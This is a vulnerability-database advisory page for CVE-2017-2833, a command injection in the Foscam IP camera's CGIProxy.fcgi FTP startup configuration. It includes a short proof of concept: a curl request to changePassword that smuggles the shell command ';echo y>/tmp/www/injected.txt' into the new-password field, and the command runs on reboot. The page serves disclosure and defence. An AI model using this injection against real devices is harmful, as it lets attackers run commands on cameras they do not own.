Lucene search

K

Foscam IP Video Camera CGIProxy.fcgi FTP Startup Configuration Command Injection Vulnerability(CVE-2017-2833)

🗓️ 15 Sep 2017 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 112 Views

Foscam IP Video Camera CGIProxy.fcgi FTP Startup Configuration Command Injection Vulnerability(CVE-2017-2833) - Command injection vulnerability allows arbitrary shell characters resulting in command injection during boot proces

Show more
Related
Code
ReporterTitlePublishedViews
Family
Talos
Foscam IP Video Camera CGIProxy.fcgi FTP Startup Configuration Command Injection Vulnerability
19 Jun 201700:00
talos
NVD
CVE-2017-2833
24 Apr 201819:29
nvd
Cvelist
CVE-2017-2833
24 Apr 201819:00
cvelist
Prion
Command injection
24 Apr 201819:29
prion
CVE
CVE-2017-2833
24 Apr 201819:29
cve
Talos Blog
Vulnerability Spotlight: Multiple Foscam C1 Vulnerabilities Come in to Focus
19 Jun 201708:45
talosblog

                                                This vulnerability is reachable during the boot process. To trigger it, a command injection must be placed either in the username or in password field of the account. This can be done by the "changePassword" command, which requires a valid user account to change the password for:
```
$ sUsr="admin"
$ sPwd=""
$ sNewPwd=`perl -MURI::Escape -e 'print uri_escape(";echo y>/tmp/www/injected.txt")'`
$ curl "http://$SERVER/cgi-bin/CGIProxy.fcgi?usr=${sUsr}&pwd=${sPwd}&cmd=changePassword&usrName=${sUsr}&oldPwd=${sPwd}&newPwd=${sNewPwd}"
```
The device should then be rebooted using other means, and the command will be executed upon boot. Note that any command that alters username and password can be used, for example the "addAccount" command.
                              

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
15 Sep 2017 00:00Current
8.4High risk
Vulners AI Score8.4
EPSS0.001
112
.json
Report